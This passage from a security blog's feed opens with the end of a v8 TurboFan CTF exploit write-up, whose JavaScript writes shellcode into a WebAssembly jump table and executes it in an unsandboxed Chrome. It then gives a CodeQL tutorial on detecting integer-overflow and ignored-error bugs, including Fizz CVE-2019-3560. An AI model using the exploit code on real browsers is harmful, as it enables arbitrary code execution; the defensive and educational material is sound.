&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// (each memory write is 8 bytes wide, but for simplicity only 1 byte of useful data is written per call)</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; shellcode.<span class="property">length</span>; i++)</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">write_8bytes</span>(<span class="title class_">JumpTableStartAddr</span> + <span class="title class_">BigInt</span>(i), shellcode[i]);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// Execute the shellcode</span></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try to execute shellcode ... &quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmJSFunction</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><p>Run the exp with the following command:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chrome/chrome --no-sandbox --user-data-dir=./userdata http:<span class="comment">//127.0.0.1:8000/test.html</span></span><br></pre></td></tr></table></figure><blockquote><p>Although the provided attachment already carries a no-sandbox patch, the exp still does not run in practice; it only triggers when the <code>--no-sandbox</code> flag is passed explicitly. I could not work out why XD.</p></blockquote><p>The result looks like this:</p><p><img src="v8-turboFan/exp.gif" alt="img"></p></li></ul><h2 id="七、参考">VII. References</h2><ol><li><a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">Introduction to TurboFan</a></li><li><a 
href="https://de4dcr0w.github.io/google-ctf-2018-browser-pwn%E5%88%86%E6%9E%90.html">google-ctf-2018-browser-pwn分析</a></li><li><a href="https://mem2019.github.io/jekyll/update/2019/08/09/Google-CTF-2018-Final-JIT.html">Why I failed to trigger Bound Check Elimination in Google CTF 2018 Final JIT</a></li><li><a href="https://xz.aliyun.com/t/3348?spm=5176.12901015.0.i12901015.1bc1525cy9bvzk">Google CTF justintime writeup - 先知社区</a></li></ol>]]></content>
    
    
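    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;I. Preface&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;v8 is a JavaScript engine developed by Google and written in C++.&lt;/p&gt;
&lt;p&gt;v8 is designed to speed up JavaScript execution inside web browsers. Rather than relying only on a traditional interpreter, it translates JS code into more efficient machine code. To that end, v8 introduces a &lt;strong&gt;JIT (Just-In-Time)&lt;/strong&gt; mechanism that compiles JS code to machine code dynamically at run time.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;TurboFan is one of the optimizing compilers in v8. It is built on the compiler concept known as &lt;a href=&quot;https://darksi.de/d.sea-of-nodes/&quot;&gt;sea of nodes&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sea of nodes does not simply refer to the nodes of some graph; it is a graph-based &lt;strong&gt;intermediate representation&lt;/strong&gt; of a special kind.&lt;/p&gt;
&lt;p&gt;It differs from an ordinary CFG/DFG; see the link above for the details.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The TurboFan sources live under the &lt;code&gt;v8/compiler&lt;/code&gt; directory.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>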
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>Learning CodeQL in Depth by security_lab</title>
    <link href="https://kiprey.github.io/2020/12/secLab-CodeQL-learning/"/>
    <id>https://kiprey.github.io/2020/12/secLab-CodeQL-learning/</id>
    <published>2020-12-24T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:40.097Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p><a href="https://github.com/github/securitylab/tree/main/CodeQL_Queries/cpp">GitHub Security Lab</a> hosts a number of example CodeQL queries.</p><p>Studying these examples deepens our understanding of CodeQL and helps us use it more effectively.</p><span id="more"></span><h2 id="二、ChakraCore-bad-overflow-check">II. ChakraCore-bad-overflow-check</h2><h3 id="1-漏洞模式">1. Vulnerability pattern</h3><ul><li><p>This example shows how to find <strong>incorrect</strong> overflow checks on integer addition.</p></li><li><p>Consider the following code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">checkOverflow</span><span class="params">(<span class="type">unsigned</span> <span class="type">short</span> x, <span class="type">unsigned</span> <span class="type">short</span> y)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// BAD: comparison is always false due to type promotion</span></span><br><span class="line">  <span class="keyword">return</span> (x + y &lt; x);  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here both operands are implicitly promoted to <code>int</code> before the addition (on platforms where <code>int</code> is wider than <code>short</code>), so the sum <strong>never wraps around</strong>. The comparison is therefore always false, the program <strong>cannot detect the overflow it was meant to catch</strong>, and that is the bug.</p></li><li><p>In the following example, by contrast:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">checkOverflow</span><span class="params">(<span class="type">unsigned</span> <span class="type">short</span> x, <span class="type">unsigned</span> <span class="type">short</span> y)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> ((<span class="type">unsigned</span> <span 
class="type">short</span>)(x + y) &lt; x);  <span class="comment">// GOOD: explicit cast</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Because the sum is explicitly cast to <code>unsigned short</code>, the result <strong>can wrap around</strong>, so the overflow check works correctly.</p></li></ul><h3 id="2-QL的编写">2. Writing the QL query</h3><ul><li><p>First, be clear about the goal: we want to find <strong>incorrect overflow-checking code</strong>, i.e. the first example above.</p></li><li><p>So let us list the conditions that characterise this pattern, i.e. what the query has to check for:</p><ul><li><p>The statement has the form <code>var1 + var2 &lt;compare&gt; var1</code>.</p></li><li><p>The two operands of the comparison (a <code>RelationalOperation</code>) are an <code>AddExpr</code> and a <code>LocalScopeVariable</code> var1.</p></li><li><p>One operand of the <code>AddExpr</code> is a <code>LocalScopeVariable</code> var1, the same variable as the var1 above.</p></li><li><p>The operand var1 must be narrower than 32 bits.</p></li><li><p>The result of the addition is either not cast at all, or cast to a type that is at least 32 bits wide.</p><blockquote><p>This is the condition that makes the overflow check ineffective, and it is exactly what we are looking for.</p></blockquote></li></ul></li><li><p>The final QL code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Matches `var &lt; var + ???`. 
*/</span></span><br><span class="line"><span class="function">predicate <span class="title">overflowCheck</span><span class="params">(LocalScopeVariable var, AddExpr add, RelationalOperation compare)</span></span>&#123;</span><br><span class="line">  <span class="comment">/* The two operands of this RelationalOperation are an access to the variable and an addition */</span></span><br><span class="line">  compare.<span class="built_in">getAnOperand</span>() = var.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">  compare.<span class="built_in">getAnOperand</span>() = add <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* The same variable is also one of the operands of that addition */</span></span><br><span class="line">  add.<span class="built_in">getAnOperand</span>() = var.<span class="built_in">getAnAccess</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from LocalScopeVariable var, AddExpr add</span><br><span class="line">where <span class="built_in">overflowCheck</span>(var, add, _)    <span class="comment">/* Find candidate overflow checks */</span></span><br><span class="line">  <span class="keyword">and</span> var.<span class="built_in">getType</span>().<span class="built_in">getSize</span>() &lt; <span class="number">4</span>   <span class="comment">/* The operand must be smaller than 4 bytes */</span></span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> add.getConversion+().<span class="built_in">getType</span>().<span class="built_in">getSize</span>() &lt; <span class="number">4</span> <span class="comment">/* No conversion narrows the sum below 4 bytes, i.e. its width stays &gt;= 32 bits */</span></span><br><span class="line">select add, <span class="string">&quot;Overflow check on variable of type &quot;</span> + var.<span class="built_in">getUnderlyingType</span>()</span><br></pre></td></tr></table></figure><blockquote><p>Note the wildcard <code>_</code> used in the <code>where</code> clause: it is a don't-care expression that stands for <strong>any value</strong>.</p></blockquote></li></ul><h2 
id="三、Facebook-Fizz-CVE-2019-3560">III. Facebook_Fizz_CVE-2019-3560</h2><h3 id="1-漏洞模式-2">1. Vulnerability pattern</h3><ul><li><p>This vulnerability is an integer overflow caused by a <code>+=</code> operator - <a href="https://github.com/facebookincubator/fizz/blob/eaa81af854bef509c3c1d7c83df0cd0b084a0fef/fizz/record/PlaintextRecordLayer.cpp#L42">src</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">folly::Optional&lt;TLSMessage&gt; <span class="title">PlaintextReadRecordLayer::read</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    folly::IOBufQueue&amp; buf)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span><br><span class="line">        <span class="comment">// 
Create a cursor at the current read position of buf</span></span><br><span class="line">        folly::<span class="function">io::Cursor <span class="title">cursor</span><span class="params">(buf.front())</span></span>;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="comment">/* ... */</span>) &#123;</span><br><span class="line">          <span class="keyword">if</span> (<span class="comment">/* ... */</span>) &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// Read a uint16_t from the position the cursor points to</span></span><br><span class="line">            <span class="keyword">auto</span> length = cursor.<span class="built_in">readBE</span>&lt;<span class="type">uint16_t</span>&gt;();</span><br><span class="line">            <span class="comment">// Check whether enough data has been received to continue parsing</span></span><br><span class="line">            <span class="keyword">if</span> (buf.<span class="built_in">chainLength</span>() &lt; (cursor - buf.<span class="built_in">front</span>()) + length) &#123;</span><br><span class="line">              <span class="keyword">return</span> folly::none;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// !!! 
Add to length (this addition can overflow)</span></span><br><span class="line">            length +=</span><br><span class="line">                <span class="built_in">sizeof</span>(ContentType) + <span class="built_in">sizeof</span>(ProtocolVersion) + <span class="built_in">sizeof</span>(<span class="type">uint16_t</span>);</span><br><span class="line">            <span class="comment">// Advance buf's pointer so that the next cursor starts further along</span></span><br><span class="line">            <span class="comment">// See the function at the bottom for details</span></span><br><span class="line">            buf.<span class="built_in">trimStart</span>(length);</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">IOBuf::trimStart</span><span class="params">(std::<span class="type">size_t</span> amount)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">DCHECK_LE</span>(amount, length_);</span><br><span class="line">    data_ += amount;</span><br><span class="line">    length_ -= amount;</span><br><span class="line">  
&#125;</span><br></pre></td></tr></table></figure></li><li><p>This code reads a <code>uint16_t</code> from the incoming network packet and stores it in <code>length</code>. <strong>In other words, <code>length</code> is attacker-controlled</strong>. The <code>if</code> statement only checks whether enough data has been received; it does <strong>not check for a possible overflow</strong>.</p></li><li><p>So if <code>length</code> wraps around to 0 in the <code>+=</code>, the call to <code>buf.trimStart</code> leaves the <strong>pointer</strong> to the data currently being processed in <code>buf</code> <strong>unchanged</strong>. In the next iteration of the loop, the cursor is <strong>set to the same position as in the current iteration</strong> and reads <strong>the same length as in the current iteration</strong>; length then <strong>wraps around to 0 again</strong>, and buf's pointer is <strong>still not advanced</strong>. This repeats indefinitely, leaving the program stuck in a loop it <strong>cannot exit</strong>, which amounts to a denial-of-service (DoS) attack.</p></li></ul><h3 id="2-QL的编写-2">2. Writing the QL query</h3><ul><li><p>First, list the necessary conditions for this vulnerability:</p><ul><li>Untrusted input</li><li>A narrowing type conversion</li></ul></li><li><p>We start by identifying an untrusted input. In Fizz, data is usually sent over a socket in <strong>network byte order</strong>, so it generally has to be converted to <strong>host byte order</strong>. This means <code>ntohs</code> and <code>ntohl</code> are usually <strong>among the sources of untrusted input</strong>. Fizz, however, uses the <code>Endian</code> class for byte-order conversion, so the query must treat values produced by the <code>Endian</code> class as the data-flow source.</p><p>The following QL code finds all declarations of the <code>Endian::big</code> function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * The endianness conversion function 
`Endian::big()`.</span></span><br><span class="line"><span class="comment"> * It is Folly&#x27;s replacement for `ntohs` and `ntohl`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EndianConvert</span> extends Function &#123;</span><br><span class="line">    <span class="built_in">EndianConvert</span>() &#123;</span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getName</span>() = <span class="string">&quot;big&quot;</span> <span class="keyword">and</span></span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getDeclaringType</span>().<span class="built_in">getName</span>().<span class="built_in">matches</span>(<span class="string">&quot;Endian&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from EndianConvert ec</span><br><span class="line">select ec</span><br></pre></td></tr></table></figure><p>With this class we can find every <code>FunctionCall</code> that calls <code>Endian::big</code>; untrusted data flows out of these <code>FunctionCall</code>s.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Holds if `i` is an endianness conversion.</span></span><br><span class="line"><span class="comment"> * (A telltale sign of network data.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">predicate <span class="title">isNetworkData</span><span 
class="params">(Instruction i)</span> </span>&#123;</span><br><span class="line">    i.(CallInstruction).<span class="built_in">getCallTarget</span>().(FunctionInstruction).<span class="built_in">getFunctionSymbol</span>() </span><br><span class="line">        instanceof EndianConvert</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Next, we look for every conversion from a larger type to a smaller one. Such conversions <strong>may overflow</strong>, and our goal is to find the ones that <strong>untrusted data can flow into</strong>.</p><blockquote><p>The <code>ConvertInstruction</code> class comes from <code>semmle.code.cpp.ir.IR</code> and matches every type conversion.</p><p>These conversions are <strong>not limited to</strong> explicit casts and implicit conversions; they also include cases such as the <code>int</code>-to-<code>bool</code> conversion in an <code>if</code> condition.</p><p>The number of matches is extremely large, so a second round of filtering is needed.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"></span><br><span class="line">from </span><br><span class="line">    ConvertInstruction conv, </span><br><span class="line">    Type inputType, </span><br><span class="line">    Type outputType</span><br><span class="line">where </span><br><span class="line">    <span class="comment">/* The converted type must be narrower than the original type */</span></span><br><span class="line">    conv.<span class="built_in">getResultSize</span>() &lt; conv.<span class="built_in">getUnary</span>().<span 
class="built_in">getResultSize</span>() <span class="keyword">and</span></span><br><span class="line">    <span class="comment">/* 获取初始类型 */</span></span><br><span class="line">    inputType = conv.<span class="built_in">getUnary</span>().<span class="built_in">getResultType</span>() <span class="keyword">and</span> </span><br><span class="line">    <span class="comment">/* 获取转换后类型 */</span></span><br><span class="line">    outputType = conv.<span class="built_in">getResultType</span>()</span><br><span class="line">select</span><br><span class="line">    conv, </span><br><span class="line">    <span class="string">&quot;Narrowing conversion from &quot;</span> + inputType + <span class="string">&quot; to &quot;</span> + outputType + <span class="string">&quot;.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>接下来，我们便可以编写全局污点追踪查询</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Cfg</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">    <span class="built_in">Cfg</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;FizzOverflowIR&quot;</span> &#125;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Holds if `source` is network data.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span 
class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123; </span><br><span class="line">        <span class="built_in">isNetworkData</span>(source.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="comment">/** Holds if `sink` is a narrowing conversion. */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123; </span><br><span class="line">        <span class="built_in">isNarrowingConversion</span>(sink.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>将上面的代码组装起来，便是以下的完整代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @name Fizz Overflow</span></span><br><span class="line"><span class="comment"> * @description Narrowing conversions on untrusted data could enable</span></span><br><span class="line"><span class="comment"> *              an attacker to trigger an integer overflow.</span></span><br><span class="line"><span class="comment"> * @kind path-problem</span></span><br><span class="line"><span class="comment"> * @problem.severity warning</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.ir.IR</span><br><span class="line"><span class="keyword">import</span> 
DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * The endianness conversion function `Endian::big()`.</span></span><br><span class="line"><span class="comment"> * It is Folly&#x27;s replacement for `ntohs` and `ntohl`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EndianConvert</span> extends Function &#123;</span><br><span class="line">    <span class="built_in">EndianConvert</span>() &#123;</span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getName</span>() = <span class="string">&quot;big&quot;</span> <span class="keyword">and</span></span><br><span class="line">      <span class="keyword">this</span>.<span class="built_in">getDeclaringType</span>().<span class="built_in">getName</span>().<span class="built_in">matches</span>(<span class="string">&quot;Endian&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/** Holds if `i` is a narrowing conversion. 
*/</span></span><br><span class="line">predicate <span class="built_in">isNarrowingConversion</span>(ConvertInstruction i) &#123;</span><br><span class="line">    i.<span class="built_in">getResultSize</span>() &lt; i.<span class="built_in">getUnary</span>().<span class="built_in">getResultSize</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Holds if `i` is an endianness conversion.</span></span><br><span class="line"><span class="comment"> * (A telltale sign of network data.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">predicate <span class="built_in">isNetworkData</span>(Instruction i) &#123;</span><br><span class="line">    i.(CallInstruction).<span class="built_in">getCallTarget</span>().(FunctionInstruction).<span class="built_in">getFunctionSymbol</span>() </span><br><span class="line">        instanceof EndianConvert</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> Cfg extends TaintTracking::Configuration &#123;</span><br><span class="line">    <span class="built_in">Cfg</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;FizzOverflowIR&quot;</span> &#125;</span><br><span class="line">  </span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Holds if `source` is network data.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123; </span><br><span class="line">        <span class="built_in">isNetworkData</span>(source.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span 
class="line">  </span><br><span class="line">    <span class="comment">/** Holds if `sink` is a narrowing conversion. */</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123; </span><br><span class="line">        <span class="built_in">isNarrowingConversion</span>(sink.<span class="built_in">asInstruction</span>()) </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from</span><br><span class="line">  Cfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink, ConvertInstruction conv,</span><br><span class="line">  Type inputType, Type outputType</span><br><span class="line">where</span><br><span class="line">  cfg.<span class="built_in">hasFlowPath</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">  conv = sink.<span class="built_in">getNode</span>().<span class="built_in">asInstruction</span>() <span class="keyword">and</span></span><br><span class="line">  inputType = conv.<span class="built_in">getUnary</span>().<span class="built_in">getResultType</span>() <span class="keyword">and</span></span><br><span class="line">  outputType = conv.<span class="built_in">getResultType</span>()</span><br><span class="line">select sink, source, sink,</span><br><span class="line">  <span class="string">&quot;Conversion of untrusted data from &quot;</span> + inputType + <span class="string">&quot; to &quot;</span> + outputType + <span class="string">&quot;.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="四、libssh2-eating-error-codes">四、libssh2_eating_error_codes</h2><h3 id="1-漏洞模式-3">1. 
漏洞模式</h3><ul><li><p>这种漏洞模式主要是由类似于以下的代码组成</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> _libssh2_get_c_string(...)&#123; <span class="comment">/* ... */</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">int</span> p_len;</span><br><span class="line"><span class="keyword">if</span>((p_len = _libssh2_get_c_string(&amp;buf, &amp;p)) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="comment">//...</span></span><br></pre></td></tr></table></figure><p>其中，<code>_libssh2_get_c_string</code>函数返回的是一个<strong>带符号的整型</strong>，但接收返回值的变量是<strong>无符号</strong>的。因此该漏洞将会使函数内部<strong>产生的error code（-1）被忽略</strong>。</p></li></ul><h3 id="2-QL的编写-3">2. 
QL的编写</h3><ul><li><p>首先，我们不使用污点分析技术来尝试查询到这些错误。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, ReturnStmt ret</span><br><span class="line">where</span><br><span class="line">  <span class="comment">/* 返回语句的返回值限定在负数 */</span></span><br><span class="line">  ret.<span class="built_in">getExpr</span>().<span class="built_in">getValue</span>().<span class="built_in">toInt</span>() &lt; <span class="number">0</span> <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 查找一个函数调用，这个函数调用将会调用 那些可能会返回-1的函数 */</span></span><br><span class="line">  call.<span class="built_in">getTarget</span>() = ret.<span class="built_in">getEnclosingFunction</span>() <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 限定函数调用的返回值被类型转换为无符号整数 */</span></span><br><span class="line">  call.<span class="built_in">getFullyConverted</span>().<span class="built_in">getType</span>().<span class="built_in">getUnderlyingType</span>().(IntegralType).<span class="built_in">isUnsigned</span>()</span><br><span class="line">select call, ret</span><br></pre></td></tr></table></figure><p>可以查询出一部分错误点。</p></li><li><p>但上面的查询代码并不能很好的找到下面这种类型的错误</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> r = <span class="built_in">f</span>();</span><br><span 
class="line"><span class="type">unsigned</span> <span class="type">int</span> x = r;</span><br></pre></td></tr></table></figure><p>因此我们要试着使用一下数据流分析技术，查询从<code>FunctionCall</code>流出的数据（即返回值）到最近一个无符号类型转换的路径。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where</span><br><span class="line">  ret.<span class="built_in">getExpr</span>().<span class="built_in">getValue</span>().<span class="built_in">toInt</span>() &lt; <span class="number">0</span> <span class="keyword">and</span></span><br><span class="line">  call.<span class="built_in">getTarget</span>() = 